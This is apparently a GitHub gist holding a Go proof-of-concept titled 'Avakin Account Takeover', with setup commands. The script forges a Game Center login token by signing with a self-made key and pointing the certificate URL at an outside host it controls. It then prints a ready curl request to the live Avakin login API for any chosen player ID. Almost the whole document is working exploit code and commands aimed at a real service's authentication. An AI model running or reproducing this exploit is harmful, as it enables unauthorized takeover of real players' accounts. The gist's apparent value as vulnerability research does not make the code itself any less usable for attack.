-
-
Save CTurt/3f2ffbd03df3adaa8d628257d50d9b56 to your computer and use it in GitHub Desktop.
Avakin Account Takeover
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Generate a certificate before running: | |
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout example.com.key -days 730 -out example.com.pem | |
openssl x509 -inform PEM -in example.com.pem -outform DER -out certificate.cer | |
Then run this script passing the Game Center player ID you would like to generate a signed login request for: | |
$ go run poc.go GameCenterID_Goes_Here | |
curl -i -k --request POST \ | |
--url https://api.avkn.co/auth/1/auth/1/login \ | |
--header 'Content-Type: application/json; charset=utf-8' \ | |
--header 'Referer: https://api.modpanel.io/auth/1/auth/1/login' \ | |
--header 'TE: identity' \ | |
--header 'User-Agent: BestHTTP 1.12.1' \ | |
--header 'X-Avkn-AdvertisingID: f4438642-50b0-4823-b106-cb6ac39819c7' \ | |
--header 'X-Avkn-ApiVersion: 15' \ | |
--header 'X-Avkn-ClientOS: GooglePlay' \ | |
--header 'X-Avkn-ClientPlatform: GooglePlay' \ | |
--header 'X-Avkn-ClientVersion: 1.063.01' \ | |
--header 'X-Avkn-ClientVersionCode: 106301' \ | |
--header 'X-Avkn-Device: samsung SM-N976N' \ | |
--header 'X-Avkn-GameSessionID: f4019f1c-b820-454a-91ea-368a7d47b2bd' \ | |
--header 'X-Avkn-TZOffset: 2' \ | |
--header 'X-Avkn-VendorID: dwcLZGDXRI6tSNzpaFmwz1' \ | |
--data '{ | |
"type": "ios", | |
"request": {"access_token":"{\"pk_url\":\"http://www.endswithapple.com/certificate.cer\",\"bundle_id\":\"yyy\",\"player_id\":\"GameCenterID_Goes_Here\",\"player_legacy_id\":\"\",\"team_player_id\":\"\",\"game_player_id\":\"\",\"signature\":\"fbv4fz8sBBFm5mshMTBBevQ0FoL5cIUQiHm4EKpUqe39PlylPaDn8YfcnvHDQ5VGtyZ8MgayaitQUQQVvFXy1NFbqkt/3hEnyp7XYhZ6gQ+5Z3RDDy1vU++5IIrbrsnV6X16eVY/ERd0I+deHqd2Tk3y5fuGES81b27ENyXRMIlKzuiqmVcDxiR22pOdWT8zEmbt1GfffeFidJB1glO+KzE31K9IBW7imUzYVhwqEEGn6LXErNUqweZlgC271sxz0sSQN1D1pifHOL8/N6VDcE1+Zk3KXTfhXBp/sBmdg93B7IVfV8wWWotSW9v21Mh8VOrCCSbnm1udDdlstCp1NGA8eBtTMlAqYOl5LuUqsXRKqkDBNWRkkULtk9ddxdGBJliZ3/2HGjkA3Qudw4LPQgr+X56ClghE31wC9RHstCYNiltz5xBuzxkBuqyD+RRVqlmADa6maCYJYF8H87cusDWB7j3gx7Awh5UaUTfdfn8iXf3GI56f9i2joLsF6YOghTkqfhcoNPWozc7y+Re3gjQF9fp2qm/8I8titHFVFFooHSRvXP53cp7BTBUdpw8t8+EwOtetkXk47nmdBmBcFxqkGBjbdGMgPTlkPwyte26MtP/r5qBY4rU81lNyqZoUbG4dbAASFevjwSy5eMD25RnkpjjWOp6IJrB6CoeeLFI=\",\"timestamp\":\"123\",\"salt\":\"c3Nz\"}","id":"GameCenterID_Goes_Here"} | |
}' | |
- CTurt | |
*/ | |
package main | |
import ( | |
"os" | |
"fmt" | |
"bytes" | |
"io/ioutil" | |
"crypto" | |
"crypto/rand" | |
"crypto/rsa" | |
"crypto/sha256" | |
"crypto/x509" | |
"encoding/pem" | |
"encoding/base64" | |
"encoding/binary" | |
"encoding/json" | |
) | |
type AccessToken struct { | |
CertificateURL string `json:"pk_url"` | |
BundleID string `json:"bundle_id"` | |
PlayerID string `json:"player_id"` | |
PlayerLegacyID string `json:"player_legacy_id"` | |
TeamPlayerID string `json:"team_player_id"` | |
GamePlayerID string `json:"game_player_id"` | |
Signature string `json:"signature"` | |
Timestamp string `json:"timestamp"` | |
Salt string `json:"salt"` | |
} | |
func GetPrivateKey() (*rsa.PrivateKey, error) { | |
key, err := ioutil.ReadFile("example.com.key") | |
if err != nil { | |
return nil, err | |
} | |
block, _ := pem.Decode(key) | |
der, err := x509.ParsePKCS8PrivateKey(block.Bytes) | |
if err != nil { | |
return nil, err | |
} | |
return der.(*rsa.PrivateKey), err | |
} | |
func main() { | |
playerID := os.Args[1] | |
bundleID := "yyy" | |
timestamp := "123" | |
salt := []byte("sss") | |
payload := new(bytes.Buffer) | |
payload.WriteString(playerID) | |
payload.WriteString(bundleID) | |
binary.Write(payload, binary.BigEndian, timestamp) | |
payload.Write(salt) | |
h := sha256.New() | |
h.Write(payload.Bytes()) | |
digest := h.Sum(nil) | |
privateKey, err := GetPrivateKey() | |
if err != nil { | |
panic(err) | |
} | |
signature, err := rsa.SignPKCS1v15(rand.Reader, privateKey, crypto.SHA256, digest[:]) | |
if err != nil { | |
panic(err) | |
} | |
accessToken := AccessToken { | |
CertificateURL: "http://www.endswithapple.com/certificate.cer", | |
BundleID: bundleID, | |
PlayerID: playerID, | |
Signature: base64.StdEncoding.EncodeToString(signature), | |
Timestamp: timestamp, | |
Salt: base64.StdEncoding.EncodeToString(salt), | |
} | |
atm, err := json.Marshal(accessToken) | |
if err != nil { | |
panic(err) | |
} | |
request := make(map[string]string) | |
request["id"] = playerID | |
request["access_token"] = string(atm) | |
rm, err := json.Marshal(request) | |
if err != nil { | |
panic(err) | |
} | |
fmt.Println(fmt.Sprintf(`curl -i -k --request POST \ | |
--url https://api.avkn.co/auth/1/auth/1/login \ | |
--header 'Content-Type: application/json; charset=utf-8' \ | |
--header 'Referer: https://api.modpanel.io/auth/1/auth/1/login' \ | |
--header 'TE: identity' \ | |
--header 'User-Agent: BestHTTP 1.12.1' \ | |
--header 'X-Avkn-AdvertisingID: f4438642-50b0-4823-b106-cb6ac39819c7' \ | |
--header 'X-Avkn-ApiVersion: 15' \ | |
--header 'X-Avkn-ClientOS: GooglePlay' \ | |
--header 'X-Avkn-ClientPlatform: GooglePlay' \ | |
--header 'X-Avkn-ClientVersion: 1.063.01' \ | |
--header 'X-Avkn-ClientVersionCode: 106301' \ | |
--header 'X-Avkn-Device: samsung SM-N976N' \ | |
--header 'X-Avkn-GameSessionID: f4019f1c-b820-454a-91ea-368a7d47b2bd' \ | |
--header 'X-Avkn-TZOffset: 2' \ | |
--header 'X-Avkn-VendorID: dwcLZGDXRI6tSNzpaFmwz1' \ | |
--data '{ | |
"type": "ios", | |
"request": %s | |
}'`, string(rm))) | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment